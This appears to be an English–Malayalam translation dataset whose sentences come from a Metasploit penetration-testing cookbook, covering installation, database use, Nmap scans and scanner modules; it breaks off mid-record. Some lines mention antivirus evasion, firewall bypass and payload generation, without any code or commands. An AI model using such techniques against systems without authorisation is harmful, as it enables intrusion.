{"en":"Metasploit is a powerful framework for penetration testing.","translation":"പെനിട്രേഷൻ ടെസ്റ്റിംഗിനായുള്ള ശക്തമായ ഒരു ചട്ടക്കൂടാണ് മെറ്റാസ്‌പ്ലോയിറ്റ്.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"This book teaches how to use Metasploit effectively.","translation":"മെറ്റാസ്‌പ്ലോയിറ്റ് ഫലപ്രദമായി എങ്ങനെ ഉപയോഗിക്കാമെന്ന് ഈ പുസ്തകം പഠിപ്പിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Install Metasploit on your Kali Linux system.","translation":"നിങ്ങളുടെ കാലി ലിനക്സ് സിസ്റ്റത്തിൽ മെറ്റാസ്‌പ്ലോയിറ്റ് ഇൻസ്റ്റാൾ ചെയ്യുക.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Evade antivirus software using Metasploit's features.","translation":"മെറ്റാസ്‌പ്ലോയിറ്റിന്റെ ഫീച്ചറുകൾ ഉപയോഗിച്ച് ആന്റിവൈറസ് സോഫ്റ്റ്‌വെയറിനെ ഒഴിവാക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Bypass firewalls to access the target system.","translation":"ലക്ഷ്യസ്ഥാന സിസ്റ്റത്തിലേക്ക് പ്രവേശിക്കാൻ ഫയർവാളുകൾ മറികടക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Exploit vulnerabilities in complex network environments.","translation":"സങ്കീർണ്ണമായ നെറ്റ്‌വർക്ക് പരിതസ്ഥിതികളിലെ ദൗർബല്യങ്ങൾ ചൂഷണം ചെയ്യുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The book is written by Daniel Teixeira and Abhinav Singh.","translation":"ഡാനിയൽ ടെയിക്സീറയും അഭിനവ് സിംഗുമാണ് ഈ പുസ്തകം എഴുതിയിരിക്കുന്നത്.","target_lang":"ml","domain":"general","complexity":"simple"} {"en":"This edition was published in 2018.","translation":"ഈ പതിപ്പ് 2018-ൽ പ്രസിദ്ധീകരിച്ചു.","target_lang":"ml","domain":"general","complexity":"simple"} {"en":"The book covers various penetration testing techniques.","translation":"ഈ പുസ്തകത്തിൽ വിവിധ നുഴഞ്ഞുകയറ്റ പരിശോധനാ രീതികളെക്കുറിച്ച് പറയുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Learn about information gathering and scanning methods.","translation":"വിവരങ്ങൾ ശേഖരിക്കുന്നതിനും സ്കാൻ ചെയ്യുന്നതിനുമുള്ള വഴികൾ പഠിക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Understand server-side exploitation strategies.","translation":"സെർവർ സൈഡ് ചൂഷണ തന്ത്രങ്ങളെക്കുറിച്ച് മനസ്സിലാക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Master the Meterpreter for post-exploitation tasks.","translation":"പോസ്റ്റ്-എക്സ്പ്ലോയിറ്റേഷൻ ടാസ്‌ക്കുകൾക്കായി മീറ്റർപ്രറ്റർ നന്നായി ഉപയോഗിക്കുക.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Use MSFvenom to generate payloads.","translation":"പേലോഡുകൾ ഉണ്ടാക്കാൻ MSFvenom ഉപയോഗിക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Explore client-side exploitation and antivirus bypass techniques.","translation":"ക്ലയിന്റ്-സൈഡ് ചൂഷണവും ആന്റിവൈറസ് ഒഴിവാക്കാനുള്ള വഴികളും പര്യവേക്ഷണം ചെയ്യുക.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"The Social-Engineer Toolkit is also discussed.","translation":"സോഷ്യൽ-എഞ്ചിനീയർ ടൂൾകിറ്റിനെക്കുറിച്ചും ഇതിൽ പറയുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Learn how to build your own Metasploit modules.","translation":"നിങ്ങളുടെ സ്വന്തം മെറ്റാസ്‌പ്ലോയിറ്റ് മൊഡ്യൂളുകൾ എങ്ങനെ ഉണ്ടാക്കാമെന്ന് പഠിക്കുക.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"The book covers wireless network penetration testing.","translation":"ഈ പുസ്തകത്തിൽ വയർലെസ് നെറ്റ്‌വർക്ക് പെനിട്രേഷൻ ടെസ്റ്റിംഗിനെക്കുറിച്ച് പറയുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Cloud penetration testing is also a topic.","translation":"ക്ലൗഡ് പെനിട്രേഷൻ ടെസ്റ്റിംഗും ഒരു വിഷയമാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Follow best practices for effective penetration testing.","translation":"ഫലപ്രദമായ പെനിട്രേഷൻ ടെസ്റ്റിംഗിനായി മികച്ച രീതികൾ പിന്തുടരുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"This book is a valuable resource for security professionals.","translation":"സുരക്ഷാ വിദഗ്ധർക്ക് ഈ പുസ്തകം വളരെ വിലപ്പെട്ടതാണ്.","target_lang":"ml","domain":"general","complexity":"simple"} {"en":"Metasploit is a leading penetration testing tool.","translation":"മെറ്റാസ്‌പ്ലോയിറ്റ് ഒരു പ്രധാനപ്പെട്ട പെനിട്രേഷൻ ടെസ്റ്റിംഗ് ഉപകരണമാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Install Metasploit on macOS using the provided installer package.","translation":"നൽകിയിട്ടുള്ള ഇൻസ്റ്റാളർ പാക്കേജ് ഉപയോഗിച്ച് macOS-ൽ മെറ്റാസ്‌പ്ലോയിറ്റ് ഇൻസ്റ്റാൾ ചെയ്യുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Kali Linux comes with Metasploit preinstalled.","translation":"കാളി ലിനക്സിൽ മെറ്റാസ്‌പ്ലോയിറ്റ് മുൻകൂട്ടി ഇൻസ്റ്റാൾ ചെയ്തിട്ടുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"The Metasploit Framework has a modular architecture.","translation":"മെറ്റാസ്‌പ്ലോയിറ്റ് ഫ്രെയിംവർക്കിന് ഒരു മോഡുലാർ ആർക്കിടെക്ചർ ഉണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Exploits and payloads are separate modules in Metasploit.","translation":"മെറ്റാസ്‌പ്ലോയിറ്റിൽ എക്‌സ്‌പ്ലോയിറ്റുകളും പേലോഡുകളും പ്രത്യേക മൊഡ്യൂളുകളാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Use msfconsole for the best support and functionality.","translation":"മികച്ച പിന്തുണയ്ക്കും പ്രവർത്തനക്ഷമതയ്ക്കും msfconsole ഉപയോഗിക്കുക.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"The web interface is available for Metasploit Community, Express, and Pro.","translation":"മെറ്റാസ്‌പ്ലോയിറ്റ് കമ്മ്യൂണിറ്റി, എക്സ്പ്രസ്, പ്രോ എന്നിവയ്ക്കായി വെബ് ഇന്റർഫേസ് ലഭ്യമാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Download the Metasploit installer from the official website.","translation":"Metasploit ഇൻസ്റ്റാളർ ഔദ്യോഗിക വെബ്സൈറ്റിൽ നിന്ന് ഡൗൺലോഡ് ചെയ്യുക.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Disable antivirus during Metasploit installation.","translation":"മെറ്റാസ്‌പ്ലോയിറ്റ് ഇൻസ്റ്റാളേഷൻ സമയത്ത് ആന്റിവൈറസ് പ്രവർത്തനരഹിതമാക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The quick installation script integrates packages into the OS's package management.","translation":"ദ്രുത ഇൻസ്റ്റാളേഷൻ സ്ക്രിപ്റ്റ് പാക്കേജുകളെ OS-ൻ്റെ പാക്കേജ് മാനേജ്മെൻ്റിലേക്ക് സംയോജിപ്പിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Run msfconsole to start the Metasploit Framework.","translation":"മെറ്റാസ്‌പ്ലോയിറ്റ് ഫ്രെയിംവർക്ക് ആരംഭിക്കാൻ msfconsole പ്രവർത്തിപ്പിക്കുക.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"The initial setup helps configure the database.","translation":"ആരംഭ സെറ്റപ്പ് ഡാറ്റാബേസ് കോൺഫിഗർ ചെയ്യാൻ സഹായിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Kali Linux is popular for its preinstalled penetration testing tools.","translation":"മുൻകൂട്ടി ഇൻസ്റ്റാൾ ചെയ്ത പെനിട്രേഷൻ ടെസ്റ്റിംഗ് ടൂളുകൾക്ക് കാളി ലിനക്സ് പ്രശസ്തമാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Set up a Metasploit development environment on Debian-based Linux.","translation":"ഡെബിയൻ അടിസ്ഥാനമാക്കിയുള്ള Linux-ൽ ഒരു Metasploit വികസന പരിസ്ഥിതി സജ്ജീകരിക്കുക.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"You can use Kali Linux in a virtual machine.","translation":"ഒരു വെർച്വൽ മെഷീനിൽ നിങ്ങൾക്ക് കാളി ലിനക്സ് ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Launch Metasploit from the Applications menu.","translation":"ആപ്ലിക്കേഷൻസ് മെനുവിൽ നിന്ന് മെറ്റാസ്‌പ്ലോയിറ്റ് പ്രവർത്തിപ്പിക്കുക.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"The database stores penetration testing results.","translation":"ഡാറ്റാബേസ് പെനിട്രേഷൻ ടെസ്റ്റിംഗ് ഫലങ്ങൾ സംഭരിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Configure PostgreSQL for Metasploit.","translation":"മെറ്റാസ്‌പ്ലോയിറ്റിനായി PostgreSQL കോൺഫിഗർ ചെയ്യുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Use the msfdb command to initialize the database.","translation":"ഡാറ്റാബേസ് ആരംഭിക്കാൻ msfdb കമാൻഡ് ഉപയോഗിക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The database.yml file contains configuration details.","translation":"database.yml ഫയലിൽ കോൺഫിഗറേഷൻ വിശദാംശങ്ങൾ അടങ്ങിയിരിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To add a new workspace, use the -a option followed by the name of the workspace.","translation":"ഒരു പുതിയ വർക്ക്‌സ്‌പേസ് ചേർക്കാൻ, -a എന്ന ഓപ്ഷൻ ഉപയോഗിക്കുക, തുടർന്ന് വർക്ക്‌സ്‌പേസിന്റെ പേര് നൽകുക.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"The default workspace is selected when connecting to the database.","translation":"ഡാറ്റാബേസിലേക്ക് കണക്ട് ചെയ്യുമ്പോൾ, ഡിഫോൾട്ട് വർക്ക്‌സ്‌പേസ് തിരഞ്ഞെടുക്കപ്പെടും.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"To list the available workspaces, simply type the workspace command.","translation":"ലഭ്യമായ വർക്ക്‌സ്‌പേസുകൾ ലിസ്റ്റ് ചെയ്യാൻ, workspace കമാൻഡ് ടൈപ്പ് ചെയ്യുക.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"To delete a workspace, use the -d option followed by the name of the workspace.","translation":"ഒരു വർക്ക്‌സ്‌പേസ് നീക്കം ചെയ്യാൻ, -d എന്ന ഓപ്ഷൻ ഉപയോഗിക്കുക, തുടർന്ന് വർക്ക്‌സ്‌പേസിന്റെ പേര് നൽകുക.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"To change the current workspace, use the workspace command followed by the name of the workspace you want to change to.","translation":"നിലവിലെ വർക്ക്‌സ്‌പേസ് മാറ്റാൻ, workspace കമാൻഡ് ഉപയോഗിക്കുക, തുടർന്ന് നിങ്ങൾ മാറ്റാൻ ആഗ്രഹിക്കുന്ന വർക്ക്‌സ്‌പേസിന്റെ പേര് നൽകുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Once the database is configured, we can start using it.","translation":"ഡാറ്റാബേസ് കോൺഫിഗർ ചെയ്ത ശേഷം, നമുക്ക് ഇത് ഉപയോഗിക്കാൻ തുടങ്ങാം.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"To test the db_import command, we will use the nmap command.","translation":"db_import കമാൻഡ് പരീക്ഷിക്കാൻ, നമ്മൾ nmap കമാൻഡ് ഉപയോഗിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Alternatively, you can run the db_nmap command directly from msfconsole.","translation":"പകരമായി, നിങ്ങൾക്ക് db_nmap കമാൻഡ് msfconsole-ൽ നിന്ന് നേരിട്ട് പ്രവർത്തിപ്പിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Now that we have data in the database, we can start by using the hosts command.","translation":"ഡാറ്റാബേസിൽ ഇപ്പോൾ ഡാറ്റ ഉള്ളതുകൊണ്ട്, നമുക്ക് ഹോസ്റ്റുകൾ കമാൻഡ് ഉപയോഗിച്ച് തുടങ്ങാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Using the -c option, we can select which columns to display.","translation":"-c എന്ന ഓപ്ഷൻ ഉപയോഗിച്ച്, ഏതൊക്കെ കോളങ്ങൾ പ്രദർശിപ്പിക്കണമെന്ന് നമുക്ക് തിരഞ്ഞെടുക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"With the -S option, we can search for specific strings, such as the OS name.","translation":"-S എന്ന ഓപ്ഷൻ ഉപയോഗിച്ച്, OS-ൻ്റെ പേര് പോലുള്ള പ്രത്യേക സ്ട്രിംഗുകൾക്കായി തിരയാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The services command allows us to display the services running on the hosts.","translation":"ഹോസ്റ്റുകളിൽ പ്രവർത്തിക്കുന്ന സേവനങ്ങൾ പ്രദർശിപ്പിക്കാൻ services കമാൻഡ് നമ്മെ സഹായിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Using the search command without any options displays all the available services.","translation":"ഓപ്ഷനുകളില്ലാതെ search കമാൻഡ് ഉപയോഗിക്കുന്നത് എല്ലാ ലഭ്യമായ സേവനങ്ങളും പ്രദർശിപ്പിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"By combining multiple options, you can search just a specific host and only display the columns you want.","translation":"ഒന്നിലധികം ഓപ്ഷനുകൾ സംയോജിപ്പിച്ച്, നിങ്ങൾക്ക് ഒരു പ്രത്യേക ഹോസ്റ്റിനായി തിരയാനും ആവശ്യമുള്ള കോളങ്ങൾ മാത്രം പ്രദർശിപ്പിക്കാനും കഴിയും.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Information gathering is the first and one of the most, if not the most, important activities in penetration testing.","translation":"പെനെട്രേഷൻ ടെസ്റ്റിംഗിലെ ഏറ്റവും പ്രധാനപ്പെട്ട ഒന്നാണ് വിവരങ്ങൾ ശേഖരിക്കുന്നത്.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"During the information gathering phase, our main focus is to collect facts about the target machine, such as the IP address, available services, and open ports.","translation":"വിവരങ്ങൾ ശേഖരിക്കുന്ന ഘട്ടത്തിൽ, ടാർഗെറ്റ് മെഷീനെക്കുറിച്ചുള്ള വിവരങ്ങൾ, അതായത് IP വിലാസം, ലഭ്യമായ സേവനങ്ങൾ, തുറന്ന പോർട്ടുകൾ എന്നിവ ശേഖരിക്കുക എന്നതാണ് നമ്മുടെ പ്രധാന ലക്ഷ്യം.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"This information plays a vital role in the process of penetration testing.","translation":"പെനെട്രേഷൻ ടെസ്റ്റിംഗ് പ്രക്രിയയിൽ ഈ വിവരങ്ങൾ ഒരു പ്രധാന പങ്ക് വഹിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Passive information gathering: This technique is used to gain information about the target, without having any physical connectivity or access to it.","translation":"നിഷ്ക്രിയ വിവരശേഖരണം: ഈ രീതി ടാർഗെറ്റിനെക്കുറിച്ച് വിവരങ്ങൾ നേടുന്നതിന് ഉപയോഗിക്കുന്നു, അതിലേക്ക് ശാരീരിക കണക്റ്റിവിറ്റിയോ ആക്സസോ ഇല്ലാതെ തന്നെ.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Active information gathering: In this technique, a logical connection is set up with the target in order to gain information.","translation":"സജീവ വിവരശേഖരണം: ഈ രീതിയിൽ, വിവരങ്ങൾ നേടുന്നതിന് ടാർഗെറ്റുമായി ഒരു ലോജിക്കൽ കണക്ഷൻ സ്ഥാപിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"The Metasploit Framework has several modules for information gathering.","translation":"വിവരങ്ങൾ ശേഖരിക്കുന്നതിന് Metasploit Framework-ൽ നിരവധി മൊഡ്യൂളുകൾ ഉണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Nmap is the most powerful and preferred scanner for security professionals.","translation":"സുരക്ഷാ വിദഗ്ധർ ഏറ്റവും കൂടുതൽ ഉപയോഗിക്കുന്നതും, ശക്തവുമായ സ്കാനറാണ് Nmap.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The usage of Nmap varies from novice to an advanced level.","translation":"Nmap-ൻ്റെ ഉപയോഗം തുടക്കക്കാർ മുതൽ വിദഗ്ധർ വരെ വ്യത്യസ്തമാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"If you want to import the results into the Metasploit database, you need to run the Nmap scan using the -oX flag.","translation":"Metasploit ഡാറ്റാബേസിലേക്ക് ഫലങ്ങൾ ഇറക്കുമതി ചെയ്യാൻ, -oX ഫ്ലാഗ് ഉപയോഗിച്ച് Nmap സ്കാൻ പ്രവർത്തിപ്പിക്കണം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Starting Nmap from Metasploit is easy.","translation":"Metasploit-ൽ നിന്ന് Nmap ആരംഭിക്കുന്നത് എളുപ്പമാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"The TCP connect scan is the most basic and default scan type in Nmap.","translation":"Nmap-ൽ ഏറ്റവും അടിസ്ഥാനപരവും, സാധാരണയായി ഉപയോഗിക്കുന്നതുമായ സ്കാൻ രീതിയാണ് TCP കണക്ട് സ്കാൻ.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"It follows the three-way handshake process to detect the open ports on the target machine.","translation":"ലക്ഷ്യസ്ഥാനത്തുള്ള കമ്പ്യൂട്ടറിലെ തുറന്ന പോർട്ടുകൾ കണ്ടെത്താൻ ഇത് ത്രീ-വേ ഹാൻഡ്‌ഷേക്ക് പ്രക്രിയ പിന്തുടരുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"A TCP connect scan is based on a three-way handshake process, hence, the returned results of this scan are considered accurate.","translation":"TCP കണക്ട് സ്കാൻ ത്രീ-വേ ഹാൻഡ്‌ഷേക്ക് പ്രക്രിയയെ അടിസ്ഥാനമാക്കിയുള്ളതാണ്, അതിനാൽ ഈ സ്കാനിന്റെ ഫലങ്ങൾ കൃത്യമാണ്.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"When using Nmap without specifying the port range, Nmap scans the most common 1,000 ports for each protocol.","translation":"പോർട്ട് ശ്രേണി വ്യക്തമാക്കാതെ Nmap ഉപയോഗിക്കുമ്പോൾ, ഓരോ പ്രോട്ടോക്കോളിനും സാധാരണയായി ഉപയോഗിക്കുന്ന 1,000 പോർട്ടുകൾ സ്കാൻ ചെയ്യുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The SYN scan is considered a stealth scanning technique.","translation":"SYN സ്കാൻ ഒരു രഹസ്യ സ്കാനിംഗ് രീതിയായി കണക്കാക്കപ്പെടുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"It never forms a complete connection between the target and the scanner.","translation":"ഇത് ലക്ഷ്യസ്ഥാനവും സ്കാനറും തമ്മിൽ പൂർണ്ണമായ ഒരു കണക്ഷൻ ഉണ്ടാക്കുന്നില്ല.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The –sS parameter will instruct Nmap to perform a SYN scan on the target machine.","translation":"-sS എന്ന പരാമീറ്റർ, ടാർഗെറ്റ് മെഷീനിൽ ഒരു SYN സ്കാൻ നടത്താൻ Nmap-നെ സഹായിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"SYN scans are difficult to detect by firewalls and Intrusion Detection Systems (IDS).","translation":"SYN സ്കാനുകൾ ഫയർവാളുകൾക്കും, നുഴഞ്ഞുകയറ്റം കണ്ടെത്താനുള്ള സംവിധാനങ്ങൾക്കും (IDS) കണ്ടെത്താൻ ബുദ്ധിമുട്ടാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The –p parameter shows the range of port numbers that we want to scan.","translation":"-p എന്ന പരാമീറ്റർ, നമ്മൾ സ്കാൻ ചെയ്യാൻ ആഗ്രഹിക്കുന്ന പോർട്ട് നമ്പറുകളുടെ ശ്രേണി കാണിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"The UDP scan is the scanning technique to identify open UDP ports on the target.","translation":"ലക്ഷ്യസ്ഥാനത്തുള്ള തുറന്ന UDP പോർട്ടുകൾ തിരിച്ചറിയാനുള്ള സ്കാനിംഗ് രീതിയാണ് UDP സ്കാൻ.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"If the port is closed, then an ICMP port unreachable message is sent back to the scanner.","translation":"പോർട്ട് അടച്ചിരിക്കുകയാണെങ്കിൽ, ഒരു ICMP പോർട്ട് ലഭ്യമല്ലാത്ത സന്ദേശം സ്കാനറിലേക്ക് തിരികെ അയയ്ക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"We have analyzed three different types of Nmap scans.","translation":"നമ്മൾ Nmap-ൻ്റെ മൂന്ന് വ്യത്യസ്ത തരം സ്കാനുകളെക്കുറിച്ച് വിശകലനം ചെയ്തു.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"The different scan options of Nmap can also be combined in a single scan.","translation":"Nmap-ൻ്റെ വ്യത്യസ്ത സ്കാൻ ഓപ്ഷനുകൾ ഒരൊറ്റ സ്കാനിൽ സംയോജിപ്പിക്കാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"During a penetration test, the scanning process can provide lots of useful results.","translation":"ഒരു പെനെട്രേഷൻ ടെസ്റ്റിംഗിൽ, സ്കാനിംഗ് പ്രക്രിയ ധാരാളം ഉപയോഗപ്രദമായ ഫലങ്ങൾ നൽകും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The scanner sends a SYN packet to the target machine.","translation":"സ്കാനർ ടാർഗെറ്റ് മെഷീനിലേക്ക് ഒരു SYN പാക്കറ്റ് അയയ്ക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"This is considered as a stealth scanning technique as it can avoid raising a flag in some misconfigured firewalls and IDS.","translation":"ചില തെറ്റായി ക്രമീകരിച്ച ഫയർവാളുകളിലും, IDS-ലും ഒരു ഫ്ലാഗ് ഉയർത്തുന്നത് ഒഴിവാക്കാൻ കഴിയുന്നതിനാൽ, ഇതൊരു രഹസ്യ സ്കാനിംഗ് രീതിയായി കണക്കാക്കപ്പെടുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"The scan results, as with the previous auxiliary modules, will get stored in the Metasploit database.","translation":"മുമ്പത്തെ സഹായ മൊഡ്യൂളുകൾ പോലെ, സ്കാൻ ഫലങ്ങളും മെറ്റാസ്പ്ലോയിറ്റ് ഡാറ്റാബേസിൽ സൂക്ഷിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The SMTP User Enumeration Utility auxiliary module, through the implementation of these SMTP commands, can reveal a list of valid users.","translation":"SMTP കമാൻഡുകൾ നടപ്പിലാക്കുന്നതിലൂടെ, SMTP ഉപയോക്തൃ എന്യൂമറേഷൻ യൂട്ടിലിറ്റി സഹായ മൊഡ്യൂളിന് സാധുവായ ഉപയോക്താക്കളുടെ ഒരു ലിസ്റ്റ് വെളിപ്പെടുത്താൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Metasploit has a built-in auxiliary module specifically for sweeping SNMP devices.","translation":"SNMP ഉപകരണങ്ങൾ സ്കാൻ ചെയ്യുന്നതിനായി മെറ്റാസ്പ്ലോയിറ്റിന് ഒരു അന്തർനിർമ്മിത സഹായ മൊഡ്യൂൾ ഉണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"We can gather loads of information using SNMP scanning modules, such as open ports, services, hostnames, processes, and uptime.","translation":"തുറന്ന പോർട്ടുകൾ, സേവനങ്ങൾ, ഹോസ്റ്റ്നാമങ്ങൾ, പ്രോസസ്സുകൾ, പ്രവർത്തന സമയം എന്നിവ പോലുള്ള വിവരങ്ങൾ SNMP സ്കാനിംഗ് മൊഡ്യൂളുകൾ ഉപയോഗിച്ച് ശേഖരിക്കാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The HTTP Robots.txt Content Scanner auxiliary module will search for robots.txt files and analyze their content.","translation":"HTTP Robots.txt ഉള്ളടക്ക സ്കാനർ സഹായ മൊഡ്യൂൾ robots.txt ഫയലുകൾക്കായി തിരയുകയും അവയുടെ ഉള്ളടക്കം വിശകലനം ചെയ്യുകയും ചെയ്യും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To run the HTTP SSL Certificate Checker auxiliary module, we need to specify the target host and the target port.","translation":"HTTP SSL സർട്ടിഫിക്കറ്റ് Checker സഹായ മൊഡ്യൂൾ പ്രവർത്തിപ്പിക്കുന്നതിന്, ടാർഗെറ്റ് ഹോസ്റ്റും ടാർഗെറ്റ് പോർട്ടും വ്യക്തമാക്കേണ്ടതുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The WinRM Authentication Method Detection auxiliary module sends a request to an HTTP/HTTPS service to see if it is a WinRM service.","translation":"WinRM പ്രാമാണീകരണ രീതി കണ്ടെത്തൽ സഹായ മൊഡ്യൂൾ ഒരു WinRM സേവനമാണോ എന്ന് പരിശോധിക്കാൻ ഒരു HTTP/HTTPS സേവനത്തിലേക്ക് ഒരു അഭ്യർത്ഥന അയയ്ക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"To use the WinRM Authentication Method Detection auxiliary module, set the target address range in RHOSTS and type run.","translation":"WinRM പ്രാമാണീകരണ രീതി കണ്ടെത്തൽ സഹായ മൊഡ്യൂൾ ഉപയോഗിക്കുന്നതിന്, RHOSTS-ൽ ടാർഗെറ്റ് വിലാസ ശ്രേണി സജ്ജീകരിച്ച് റൺ ടൈപ്പ് ചെയ്യുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Nessus is one of the most widely used vulnerability scanners.","translation":"Nessus ഏറ്റവും കൂടുതൽ ഉപയോഗിക്കുന്ന ഒരു സുരക്ഷാ വീഴ്ച സ്കാനറാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"To install Nessus on Kali Linux, on the download page choose the Debian software package file (.deb) for your version.","translation":"Kali Linux-ൽ Nessus ഇൻസ്റ്റാൾ ചെയ്യുന്നതിന്, ഡൗൺലോഡ് പേജിൽ നിന്ന് നിങ്ങളുടെ പതിപ്പിനായുള്ള Debian സോഫ്റ്റ്‌വെയർ പാക്കേജ് ഫയൽ (.deb) തിരഞ്ഞെടുക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To connect to Nessus, use the nessus_connect command with the Nessus credentials, hostname, port, and verify the SSL certificate.","translation":"Nessus-ലേക്ക് കണക്ട് ചെയ്യുന്നതിന്, Nessus ക്രെഡൻഷ്യലുകൾ, ഹോസ്റ്റ്നാമം, പോർട്ട് എന്നിവ ഉപയോഗിച്ച് nessus_connect കമാൻഡ് ഉപയോഗിക്കുക, കൂടാതെ SSL സർട്ടിഫിക്കറ്റ് പരിശോധിക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To create a new Nessus scan, we use the nessus_scan_new command followed by the UUID of the policy.","translation":"ഒരു പുതിയ Nessus സ്കാൻ ഉണ്ടാക്കാൻ, നാം nessus_scan_new കമാൻഡ് ഉപയോഗിക്കുന്നു, തുടർന്ന് നയം UUID.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The nessus_scan_list command returns a list of information about current scans.","translation":"nessus_scan_list കമാൻഡ് നിലവിലെ സ്കാനുകളെക്കുറിച്ചുള്ള വിവരങ്ങൾ നൽകുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"When the scan is complete, we can import scan results into Metasploit using the nessus_db_import command.","translation":"സ്കാൻ പൂർത്തിയാകുമ്പോൾ, nessus_db_import കമാൻഡ് ഉപയോഗിച്ച് സ്കാൻ ഫലങ്ങൾ മെറ്റാസ്പ്ലോയിറ്റിലേക്ക് ഇറക്കുമതി ചെയ്യാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"NeXpose is a popular tool by Rapid7, which performs the task of vulnerability scanning and importing results to the Metasploit database.","translation":"Rapid7-ൻ്റെ ഒരു 